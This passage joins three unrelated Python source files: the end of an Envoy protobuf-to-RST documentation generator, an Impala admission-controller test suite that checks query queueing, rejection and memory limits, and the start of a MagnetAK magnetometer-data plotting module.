'https://cloud.google.com/natural-language/docs/reference/rpc/google.rpc#%s'
% rpc.lower())
elif field.type_name:
return field.type_name
pretty_type_names = {
field.TYPE_DOUBLE: 'double',
field.TYPE_FLOAT: 'float',
field.TYPE_INT32: 'int32',
field.TYPE_SFIXED32: 'int32',
field.TYPE_SINT32: 'int32',
field.TYPE_FIXED32: 'uint32',
field.TYPE_UINT32: 'uint32',
field.TYPE_INT64: 'int64',
field.TYPE_SFIXED64: 'int64',
field.TYPE_SINT64: 'int64',
field.TYPE_FIXED64: 'uint64',
field.TYPE_UINT64: 'uint64',
field.TYPE_BOOL: 'bool',
field.TYPE_STRING: 'string',
field.TYPE_BYTES: 'bytes',
}
if field.type in pretty_type_names:
return FormatExternalLink(
pretty_type_names[field.type],
'https://developers.google.com/protocol-buffers/docs/proto#scalar')
raise ProtodocError('Unknown field type ' + str(field.type))
def StripLeadingSpace(s):
"""Remove leading space in flat comment strings."""
return MapLines(lambda s: s[1:], s)
def FileCrossRefLabel(msg_name):
"""File cross reference label."""
return 'envoy_api_file_%s' % msg_name
def MessageCrossRefLabel(msg_name):
"""Message cross reference label."""
return 'envoy_api_msg_%s' % msg_name
def EnumCrossRefLabel(enum_name):
"""Enum cross reference label."""
return 'envoy_api_enum_%s' % enum_name
def FieldCrossRefLabel(field_name):
"""Field cross reference label."""
return 'envoy_api_field_%s' % field_name
def EnumValueCrossRefLabel(enum_value_name):
"""Enum value cross reference label."""
return 'envoy_api_enum_value_%s' % enum_value_name
def FormatAnchor(label):
"""Format a label as an Envoy API RST anchor."""
return '.. _%s:\n\n' % label
def FormatFieldAsDefinitionListItem(outer_type_context, type_context, field):
"""Format a FieldDescriptorProto as RST definition list item.
Args:
outer_type_context: contextual information for enclosing message.
type_context: contextual information for message/enum/field.
field: FieldDescriptorProto.
Returns:
RST formatted definition list item.
"""
if field.HasField('oneof_index'):
oneof_template = '\nPrecisely one of %s must be set.\n' if type_context.oneof_required[
field.oneof_index] else '\nOnly one of %s may be set.\n'
oneof_comment = oneof_template % ', '.join(
FormatInternalLink(
f, FieldCrossRefLabel(outer_type_context.ExtendField(0, f).name))
for f in type_context.oneof_fields[field.oneof_index])
else:
oneof_comment = ''
anchor = FormatAnchor(FieldCrossRefLabel(type_context.name))
annotations = []
if field.options.HasExtension(validate_pb2.rules):
rule = field.options.Extensions[validate_pb2.rules]
if ((rule.HasField('message') and rule.message.required) or
(rule.HasField('string') and rule.string.min_bytes > 0) or
(rule.HasField('repeated') and rule.repeated.min_items > 0)):
annotations.append('*REQUIRED*')
leading_comment, comment_annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in comment_annotations:
return ''
comment = '(%s) ' % ', '.join(
[FormatFieldType(type_context, field)] + annotations) + leading_comment
return anchor + field.name + '\n' + MapLines(
functools.partial(Indent, 2), comment + oneof_comment)
def FormatMessageAsDefinitionList(type_context, msg):
"""Format a DescriptorProto as RST definition list.
Args:
type_context: contextual information for message/enum/field.
msg: DescriptorProto.
Returns:
RST formatted definition list item.
"""
type_context.oneof_fields = defaultdict(list)
type_context.oneof_required = defaultdict(bool)
for index, field in enumerate(msg.field):
if field.HasField('oneof_index'):
_, comment_annotations = type_context.ExtendField(
index, field.name).LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in comment_annotations:
continue
type_context.oneof_fields[field.oneof_index].append(field.name)
for index, oneof_decl in enumerate(msg.oneof_decl):
if oneof_decl.options.HasExtension(validate_pb2.required):
type_context.oneof_required[index] = oneof_decl.options.Extensions[
validate_pb2.required]
return '\n'.join(
FormatFieldAsDefinitionListItem(
type_context, type_context.ExtendField(index, field.name), field)
for index, field in enumerate(msg.field)) + '\n'
def FormatMessage(type_context, msg):
"""Format a DescriptorProto as RST section.
Args:
type_context: contextual information for message/enum/field.
msg: DescriptorProto.
Returns:
RST formatted section.
"""
# Skip messages synthesized to represent map types.
if msg.options.map_entry:
return ''
# We need to do some extra work to recover the map type annotation from the
# synthesized messages.
type_context.map_typenames = {
'%s.%s' % (type_context.name, nested_msg.name): 'map<%s, %s>' % tuple(
map(
functools.partial(FormatFieldType, type_context),
nested_msg.field))
for nested_msg in msg.nested_type
if nested_msg.options.map_entry
}
nested_msgs = '\n'.join(
FormatMessage(
type_context.ExtendNestedMessage(index, nested_msg.name), nested_msg)
for index, nested_msg in enumerate(msg.nested_type))
nested_enums = '\n'.join(
FormatEnum(
type_context.ExtendNestedEnum(index, nested_enum.name), nested_enum)
for index, nested_enum in enumerate(msg.enum_type))
anchor = FormatAnchor(MessageCrossRefLabel(type_context.name))
header = FormatHeader('-', type_context.name)
proto_link = FormatExternalLink('[%s proto]' % type_context.name,
type_context.GithubUrl()) + '\n\n'
leading_comment, annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in annotations:
return ''
return anchor + header + proto_link + leading_comment + FormatMessageAsJson(
type_context, msg) + FormatMessageAsDefinitionList(
type_context, msg) + nested_msgs + '\n' + nested_enums
def FormatEnumValueAsDefinitionListItem(type_context, enum_value):
"""Format a EnumValueDescriptorProto as RST definition list item.
Args:
type_context: contextual information for message/enum/field.
enum_value: EnumValueDescriptorProto.
Returns:
RST formatted definition list item.
"""
anchor = FormatAnchor(EnumValueCrossRefLabel(type_context.name))
default_comment = '*(DEFAULT)* ' if enum_value.number == 0 else ''
leading_comment, annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in annotations:
return ''
comment = default_comment + UNICODE_INVISIBLE_SEPARATOR + leading_comment
return anchor + enum_value.name + '\n' + MapLines(
functools.partial(Indent, 2), comment)
def FormatEnumAsDefinitionList(type_context, enum):
"""Format a EnumDescriptorProto as RST definition list.
Args:
type_context: contextual information for message/enum/field.
enum: DescriptorProto.
Returns:
RST formatted definition list item.
"""
return '\n'.join(
FormatEnumValueAsDefinitionListItem(
type_context.ExtendEnumValue(index, enum_value.name), enum_value)
for index, enum_value in enumerate(enum.value)) + '\n'
def FormatEnum(type_context, enum):
"""Format an EnumDescriptorProto as RST section.
Args:
type_context: contextual information for message/enum/field.
enum: EnumDescriptorProto.
Returns:
RST formatted section.
"""
anchor = FormatAnchor(EnumCrossRefLabel(type_context.name))
header = FormatHeader('-', 'Enum %s' % type_context.name)
proto_link = FormatExternalLink('[%s proto]' % type_context.name,
type_context.GithubUrl()) + '\n\n'
leading_comment, annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in annotations:
return ''
return anchor + header + proto_link + leading_comment + FormatEnumAsDefinitionList(
type_context, enum)
def FormatProtoAsBlockComment(proto):
"""Format as RST a proto as a block comment.
Useful in debugging, not usually referenced.
"""
return '\n\nproto::\n\n' + MapLines(functools.partial(Indent, 2),
str(proto)) + '\n'
def GenerateRst(proto_file):
"""Generate a RST representation from a FileDescriptor proto."""
source_code_info = SourceCodeInfo(proto_file.name,
proto_file.source_code_info)
# Find the earliest detached comment, attribute it to file level.
# Also extract file level titles if any.
header, comment = FormatHeaderFromFile(
'=', source_code_info.file_level_comment, proto_file.name)
package_prefix = NormalizeFQN('.' + proto_file.package + '.')[:-1]
package_type_context = TypeContext(source_code_info, package_prefix)
msgs = '\n'.join(
FormatMessage(package_type_context.ExtendMessage(index, msg.name), msg)
for index, msg in enumerate(proto_file.message_type))
enums = '\n'.join(
FormatEnum(package_type_context.ExtendEnum(index, enum.name), enum)
for index, enum in enumerate(proto_file.enum_type))
debug_proto = FormatProtoAsBlockComment(proto_file)
return header + comment + msgs + enums # + debug_proto
def Main():
# http://www.expobrain.net/2015/09/13/create-a-plugin-for-google-protocol-buffer/
request = plugin_pb2.CodeGeneratorRequest()
request.ParseFromString(sys.stdin.read())
response = plugin_pb2.CodeGeneratorResponse()
cprofile_enabled = os.getenv('CPROFILE_ENABLED')
for proto_file in request.proto_file:
f = response.file.add()
f.name = proto_file.name + '.rst'
if cprofile_enabled:
pr = cProfile.Profile()
pr.enable()
# Generate the RST for this proto file descriptor and attach it to the response.
f.content = GenerateRst(proto_file)
if cprofile_enabled:
pr.disable()
stats_stream = StringIO.StringIO()
ps = pstats.Stats(pr, stream=stats_stream).sort_stats(os.getenv('CPROFILE_SORTBY', 'cumulative'))
stats_file = response.file.add()
stats_file.name = proto_file.name + '.rst.profile'
ps.print_stats()
stats_file.content = stats_stream.getvalue()
sys.stdout.write(response.SerializeToString())
if __name__ == '__main__':
Main()
|
|
#!/usr/bin/env python
# Copyright (c) 2014 Cloudera, Inc. All rights reserved.
# Tests admission control
import pytest
import threading
import re
from time import sleep, time
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.impala_cluster import ImpalaCluster
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_single_exec_option_dimension
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.common.test_vector import TestDimension
import logging
import os
LOG = logging.getLogger('admission_test')
# The test queries run with a WAIT debug action so they never finish executing. The
# limit is a parameter for debugging purposes; each thread inserts its id as the limit
# so that running queries can be correlated with the thread that submitted them.
QUERY = "select * from alltypes limit %s"
# Time to sleep (in milliseconds) between issuing queries. The default statestore
# heartbeat is 500ms, so the lower the delay the more we can submit before the global
# state is updated. When the delay is at least the statestore heartbeat frequency, all
# state should be visible by every impalad by the time the next query is submitted.
SUBMISSION_DELAY_MS = [0, 50, 100, 600]
# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
NUM_QUERIES = [15, 30, 50]
# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]
# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"
# The statestore heartbeat of the impala cluster the test is executing against
STATESTORE_HEARTBEAT_MS = 500
# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5
# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10
# Mem limit (bytes) used in the mem limit test
MEM_TEST_LIMIT = 100000 * 1024 * 1024
_STATESTORED_ARGS = "-statestore_heartbeat_frequency_ms=%s" % (STATESTORE_HEARTBEAT_MS)
def impalad_admission_ctrl_flags(max_requests, max_queued, mem_limit):
return ("-vmodule admission-controller=3 -default_pool_max_requests %s "
"-default_pool_max_queued %s -default_pool_mem_limit %s" %\
(max_requests, max_queued, mem_limit))
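# Illustrative sketch, not part of the original test: with the constants above,
# impalad_admission_ctrl_flags(MAX_NUM_CONCURRENT_QUERIES, MAX_NUM_QUEUED_QUERIES, -1)
# expands to the single-line flag string
#   -vmodule admission-controller=3 -default_pool_max_requests 5
#   -default_pool_max_queued 10 -default_pool_mem_limit -1
# (wrapped here for readability).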
def impalad_admission_ctrl_config_args():
impalad_home = os.environ['IMPALA_HOME']
resources_dir = os.path.join(impalad_home, "fe", "src", "test", "resources")
fs_allocation_path = os.path.join(resources_dir, "fair-scheduler-test2.xml")
llama_site_path = os.path.join(resources_dir, "llama-site-test2.xml")
return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
"-llama_site_path %s" % (fs_allocation_path, llama_site_path))
def log_metrics(log_prefix, metrics, log_level=logging.DEBUG):
LOG.log(log_level, "%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "\
"completed=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'],
metrics['dequeued'], metrics['rejected'], metrics['completed'],
metrics['timed-out'])
def compute_metric_deltas(m2, m1, metric_names):
"""Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)"""
return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in metric_names)
def metric_key(pool_name, metric_name):
"""Helper method to construct the admission controller metric keys"""
return "admission-controller.%s.%s" % (pool_name, metric_name)
class TestAdmissionController(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionController, cls).add_test_dimensions()
cls.TestMatrix.add_dimension(create_single_exec_option_dimension())
# There's no reason to test this on other file formats/compression codecs right now
cls.TestMatrix.add_dimension(create_uncompressed_text_dimension(cls.get_workload()))
def __check_pool_rejected(self, client, pool, expected_error_re):
try:
client.set_configuration({'request_pool': pool})
client.execute("select 1")
assert False, "Query should return error"
except ImpalaBeeswaxException as e:
assert re.search(expected_error_re, str(e))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(),
statestored_args=_STATESTORED_ARGS)
def test_set_request_pool(self, vector):
"""Tests setting the REQUEST_POOL with the pool placement policy configured
to require a specific pool (IMPALA-1050)."""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
for pool in ['', 'not_a_pool_name']:
expected_error =\
"No mapping found for request from user '\w+' with requested pool '%s'"\
% (pool)
self.__check_pool_rejected(client, pool, expected_error)
# Check rejected if user does not have access.
expected_error = "Request from user '\w+' with requested pool 'root.queueC' "\
"denied access to assigned pool 'root.queueC'"
self.__check_pool_rejected(client, 'root.queueC', expected_error)
# Also try setting a valid pool
client.set_configuration({'request_pool': 'root.queueB'})
client.execute("select 1") # Query should execute in queueB
finally:
client.close()
class TestAdmissionControllerStress(TestAdmissionController):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. The queries are set with the WAIT debug action so that we have more control
over the state that the admission controller uses to make decisions. Each query is
submitted on a separate thread. Depending on the test parameters a varying number of
queries will be admitted, queued, and rejected. Once queries are admitted, the query
execution blocks and we can cancel the query in order to allow another queued query to
be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Cancel the currently running queries (they are blocked with the WAIT debug action)
and verify the metric for the number of completed queries. The threads that
submitted those queries should complete.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
fetch() the results (which will block).
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerStress, cls).add_test_dimensions()
cls.TestMatrix.add_dimension(TestDimension('num_queries', *NUM_QUERIES))
cls.TestMatrix.add_dimension(
TestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION))
cls.TestMatrix.add_dimension(
TestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS))
if cls.exploration_strategy() == 'core':
cls.TestMatrix.add_constraint(lambda v: v.get_value('submission_delay_ms') == 0)
cls.TestMatrix.add_constraint(lambda v: v.get_value('num_queries') == 30)
cls.TestMatrix.add_constraint(\
lambda v: v.get_value('round_robin_submission') == True)
def setup(self):
# All threads are stored in this list and it's used just to make sure we clean up
# properly in teardown.
self.all_threads = list()
# Each submission thread will append() itself to this list if the query begins
# execution. The main thread will access this list to determine which threads are
# executing queries that can be cancelled (it will pop() elements from the front of
# the list). The individual operations on the list are atomic and thread-safe thanks
# to the GIL.
self.executing_threads = list()
def teardown(self):
for thread in self.all_threads:
try:
thread.lock.acquire()
thread.shutdown = True
if thread.query_handle is not None:
LOG.debug("Attempt to clean up thread executing query %s (state %s)",
thread.query_num, thread.query_state)
client = thread.impalad.service.create_beeswax_client()
try:
client.cancel(thread.query_handle)
finally:
client.close()
finally:
thread.lock.release()
thread.join(5)
LOG.debug("Join thread for query num %s %s", thread.query_num,
"TIMED OUT" if thread.isAlive() else "")
def get_admission_metrics(self):
"""
Returns a map of the admission metrics, aggregated across all of the impalads.
The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued',
'rejected', 'completed', and 'timed-out'.
"""
metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected' : 0,
'completed': 0, 'timed-out': 0}
for impalad in self.impalads:
for short_name in metrics.keys():
metrics[short_name] += impalad.service.get_metric_value(\
metric_key(self.pool_name, 'local-%s' % short_name), 0)
return metrics
def wait_for_metric_changes(self, metric_names, initial, expected_delta, timeout=30):
"""
Waits for the sum of metrics in metric_names to change by at least expected_delta.
This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
metrics aggregated across all impalads, e.g. we want to wait for the total number of
admitted, queued, and rejected metrics to change some amount in total, but we don't
know exactly how the metrics will change individually.
'metric_names' is a list of the keys returned by get_admission_metrics() which are
expected to change.
'initial' is the initial set of metrics returned by get_admission_metrics() to
compare against.
'expected_delta' is the total change expected across all impalads for the specified
metrics.
"""
log_metrics("wait_for_metric_changes, initial=", initial)
current = initial
start_time = time()
while True:
current = self.get_admission_metrics()
log_metrics("wait_for_metric_changes, current=", current)
deltas = compute_metric_deltas(current, initial, metric_names)
delta_sum = sum([ deltas[x] for x in metric_names ])
LOG.debug("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",\
delta_sum, deltas, expected_delta, metric_names)
if delta_sum >= expected_delta:
LOG.debug("Found all %s metrics after %s seconds", delta_sum,
round(time() - start_time, 1))
return (deltas, current)
assert (time() - start_time < timeout),\
"Timed out waiting %s seconds for metrics" % (timeout,)
sleep(1)
def wait_for_heartbeats(self, heartbeats, timeout=30):
"""Waits for a number of statestore heartbeats from all impalads."""
start_time = time()
num_impalads = len(self.impalads)
init = dict()
curr = dict()
for impalad in self.impalads:
init[impalad] = impalad.service.get_metric_value(\
'statestore-subscriber.heartbeat-interval-time')['count']
curr[impalad] = init[impalad]
while True:
LOG.debug("wait_for_heartbeats: curr=%s, init=%s, d=%s", curr.values(),
init.values(), [curr[i] - init[i] for i in self.impalads])
if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
for impalad in self.impalads:
curr[impalad] = impalad.service.get_metric_value(\
'statestore-subscriber.heartbeat-interval-time')['count']
assert (time() - start_time < timeout),\
"Timed out waiting %s seconds for heartbeats" % (timeout,)
sleep(0.5)
LOG.debug("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads, timeout=30):
"""
Wait for query submission threads to update after being admitted, as determined
by observing metric changes. This is necessary because the metrics may change
before the execute_async() calls on the query threads return and add themselves
to self.executing_threads.
"""
start_time = time()
LOG.debug("Waiting for %s threads to begin execution", num_threads)
# All individual list operations are thread-safe, so we don't need to use a
# lock to synchronize before checking the list length (on which another thread
# may call append() concurrently).
while len(self.executing_threads) < num_threads:
assert (time() - start_time < timeout),\
"Timed out waiting %s seconds for %s admitted client rpcs to return" %\
(timeout, num_threads)
sleep(0.1)
LOG.debug("Found all %s admitted threads after %s seconds", num_threads,
round(time() - start_time, 1))
def cancel_admitted_queries(self, num_queries):
"""
Cancels queries on threads that are currently blocked on query execution.
"""
assert len(self.executing_threads) >= num_queries
LOG.debug("Cancelling %s queries", num_queries)
for i in xrange(num_queries):
# pop() is thread-safe, it's OK if another thread is appending concurrently.
thread = self.executing_threads.pop(0)
LOG.debug("Cancelling query %s", thread.query_num)
# The other thread sets the query_state before appending itself to the list,
# and will not change its state until it is cancelled by this thread.
assert thread.query_state == 'ADMITTED'
client = thread.impalad.service.create_beeswax_client()
try:
cancel_result = client.cancel(thread.query_handle)
assert cancel_result.status_code == 0,\
'Unexpected status code from cancel request: %s' % cancel_result
# Wait for the query to be cancelled and return
thread.join(20)
LOG.debug("Cancelled admitted query %s %s",
thread.query_num, "TIMED OUT" if thread.isAlive() else "")
assert not thread.isAlive()
assert thread.query_state == 'COMPLETED'
finally:
client.close()
class SubmitQueryThread(threading.Thread):
def __init__(self, impalad, additional_query_options, vector, query_num,
executing_threads):
"""
executing_threads must be provided so that this thread can add itself when the
query is admitted and begins execution.
"""
super(self.__class__, self).__init__()
self.executing_threads = executing_threads
self.vector = vector
self.additional_query_options = additional_query_options
self.query_num = query_num
self.impalad = impalad
self.error = None
# query_state is defined and used only by the test code, not a property exposed by
# the server
self.query_state = 'NOT_SUBMITTED'
# lock protects query_handle and shutdown, used by the main thread in teardown()
self.lock = threading.RLock()
self.query_handle = None
self.shutdown = False # Set by the main thread when tearing down
def run(self):
client = None
try:
try:
# Take the lock while query_handle is being created to avoid an unlikely race
# condition with teardown() (i.e. if an error occurs on the main thread), and
# check if the test is already shut down.
self.lock.acquire()
if self.shutdown:
return
exec_options = self.vector.get_value('exec_option')
exec_options['debug_action'] = '0:GETNEXT:WAIT'
exec_options.update(self.additional_query_options)
query = QUERY % (self.query_num,)
self.query_state = 'SUBMITTING'
client = self.impalad.service.create_beeswax_client()
ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
client.set_configuration(exec_options)
LOG.debug("Submitting query %s", self.query_num)
self.query_handle = client.execute_async(query)
except ImpalaBeeswaxException as e:
if "Rejected" in str(e):
LOG.debug("Rejected query %s", self.query_num)
self.query_state = 'REJECTED'
return
elif "exceeded timeout" in str(e):
LOG.debug("Query %s timed out", self.query_num)
self.query_state = 'TIMED OUT'
return
else:
raise e
finally:
self.lock.release()
LOG.debug("Admitted query %s", self.query_num)
self.query_state = 'ADMITTED'
# The thread becomes visible to the main thread when it is added to the
# shared list of executing_threads. append() is atomic and thread-safe.
self.executing_threads.append(self)
try:
# fetch() will block until we cancel the query from the main thread
# (unless an unexpected error occurs). If an error occurs on the main thread,
# it is possible that teardown() cancels this query before we call fetch(). In
# that case a different exception is thrown and we handle it gracefully.
client.fetch(query, self.query_handle)
# The cancelled query may occasionally return with an OK status (IMPALA-1047).
self.query_state = 'COMPLETED'
self.query_handle = None
except ImpalaBeeswaxException as e:
if "Cancelled" in str(e):
LOG.debug("Query %s completed", self.query_num)
self.query_state = 'COMPLETED'
self.query_handle = None
elif "Invalid or unknown query handle" in str(e):
# May happen if the test is being torn down early (i.e. an error occurred).
LOG.debug("Query %s already cancelled in test shutdown.")
else:
raise e
except Exception as e:
LOG.exception(e)
# Unknown errors will be raised later
self.error = e
self.query_state = 'ERROR'
finally:
LOG.debug("Thread terminating in state=%s", self.query_state)
if client is not None:
client.close()
def run_admission_test(self, vector, additional_query_options):
LOG.debug("Starting test case with parameters: %s", vector)
self.impalads = self.cluster.impalads
round_robin_submission = vector.get_value('round_robin_submission')
submission_delay_ms = vector.get_value('submission_delay_ms')
if not round_robin_submission:
self.impalads = [self.impalads[0]]
num_queries = vector.get_value('num_queries')
assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
initial_metrics = self.get_admission_metrics()
log_metrics("Initial metrics: ", initial_metrics)
# Want query_num to start at 1 because this gets used as the limit in the query to
# help debugging (we can associate a running query with a thread). If we start at 0,
# that query would be evaluated as a constant expression and never hit the WAIT debug
# action.
for query_num in xrange(1, num_queries + 1):
impalad = self.impalads[query_num % len(self.impalads)]
thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
query_num, self.executing_threads)
thread.start()
self.all_threads.append(thread)
sleep(submission_delay_ms / 1000.0)
# Wait for all of the queries to be admitted, queued, or rejected (as reported
# by the impalad metrics).
LOG.debug("Wait for initial admission decisions")
(metric_deltas, curr_metrics) = self.wait_for_metric_changes(\
['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
# Also wait for the threads that submitted the queries to start executing
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Check that the admission decisions are reasonable given the test parameters
# The number of admitted and queued requests should be at least the configured limits
# but less than or equal to those limits times the number of impalads.
assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES
assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads)
assert metric_deltas['queued'] >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads)
assert metric_deltas['rejected'] ==\
num_queries - metric_deltas['admitted'] - metric_deltas['queued']
initial_metric_deltas = metric_deltas
while len(self.executing_threads) > 0:
curr_metrics = self.get_admission_metrics()
log_metrics("Main loop, curr_metrics: ", curr_metrics)
num_to_cancel = len(self.executing_threads)
LOG.debug("Main loop, will cancel %s queries", num_to_cancel)
self.cancel_admitted_queries(num_to_cancel)
self.wait_for_metric_changes(['completed'], curr_metrics, num_to_cancel)
num_queued_remaining =\
curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
(metric_deltas, _) = self.wait_for_metric_changes(['admitted'], curr_metrics,
expected_admitted)
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Wait a few heartbeats to ensure the admission controllers have reached a steady
# state or we may find an impalad dequeue more requests after we capture metrics.
self.wait_for_heartbeats(4)
final_metrics = self.get_admission_metrics()
log_metrics("Final metrics: ", final_metrics, logging.INFO)
metric_deltas = compute_metric_deltas(final_metrics, initial_metrics,
final_metrics.keys())
assert metric_deltas['timed-out'] == 0
if round_robin_submission:
min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] >= min_expected_admitted
assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
assert metric_deltas['admitted'] ==\
initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
assert metric_deltas['queued'] == initial_metric_deltas['queued']
assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
else:
# We shouldn't go over the max number of queries or queue size so we can compute
# the expected number of queries that should have been admitted (which includes the
# number queued as they eventually get admitted as well), queued, and rejected
expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] == expected_admitted
assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
assert metric_deltas['rejected'] == num_queries - expected_admitted
for thread in self.all_threads:
if thread.error is not None:
raise thread.error
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(MAX_NUM_CONCURRENT_QUERIES,
MAX_NUM_QUEUED_QUERIES, -1),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_flags(self, vector):
self.pool_name = 'default-pool'
self.run_admission_test(vector, {'request_pool': self.pool_name})
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_configs(self, vector):
self.pool_name = 'root.queueB'
self.run_admission_test(vector, {'request_pool': self.pool_name})
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(MAX_NUM_CONCURRENT_QUERIES * 100,
MAX_NUM_QUEUED_QUERIES, MEM_TEST_LIMIT),
statestored_args=_STATESTORED_ARGS)
def test_mem_limit(self, vector):
self.pool_name = 'default-pool'
# Each query mem limit (set the query option to override the per-host memory
# estimate) should use a bit less than (total pool mem limit) / #queries so that
# once #queries are running, the total pool mem usage is about at the limit and
# additional incoming requests will be rejected. The actual pool limit on the number
# of running requests is very high so that requests are only queued/rejected due to
# the mem limit.
num_impalads = len(self.cluster.impalads)
query_mem_limit = (MEM_TEST_LIMIT / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
self.run_admission_test(vector,
{'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
|
|
"""
Copyright 2014 Google Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Chris Riederer
# Google, Inc
# 2014-08-26
"""Plotting module for MagnetAK, the Magnetometer Android toolKit"""
import magnetak_util
import pylab as pl
import numpy as np
import scipy.interpolate  # needed by PlotInterpolatedSnips
TRUE_COLOR = 'green'
INPUT_COLOR = 'red'
def PlotData(runData, optPlotData=False, inputLabels=[]):
"""Plots the data from a run"""
pl.figure()
pl.title(runData['systemInfo']['Build.MODEL'] + " " + runData['filename'])
magData = np.array(runData['magnetometer'])
magDomain = magData[:,0] # first index is time, second is accuracy
accuracyData = magData[:,1]
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
# pl.scatter(magDomain, X, color='red')
# pl.scatter(magDomain, Y, color='blue')
# pl.scatter(magDomain, Z, color='green')
# pl.scatter(magDomain, mag, color='black')
pl.plot(magDomain, X, color='red')
pl.plot(magDomain, Y, color='blue')
pl.plot(magDomain, Z, color='green')
pl.plot(magDomain, mag, color='black')
pl.xlabel("Time (ns)") # show axes labels
pl.ylabel("Magnetometer Data ($\mu$T)")
pl.legend(["X","Y","Z","Magnitude"], loc="lower left")
accuracyColors = ['red','blue','green','black']
if optPlotData:
for index in xrange(1,len(accuracyData)-1):
if accuracyData[index] != accuracyData[index-1]:
pl.scatter(magDomain[index], 0,
color=accuracyColors[int(accuracyData[index])])
if 'labels' in runData.keys() and len(runData['labels']):
labelTime = np.array(runData['labels'])[:,0]
for t in labelTime:
pl.axvline(t, color=TRUE_COLOR)
for inputLabel in inputLabels:
pl.axvline(inputLabel, color=INPUT_COLOR)
def format_coord(x, y): # let us see the full time coordinate in the display
return 'x=%16f, y=%16f' % (x / 1e6, y)
ax = pl.gca()
ax.format_coord = format_coord
def PlotList(runDataList, optPlotData=True):
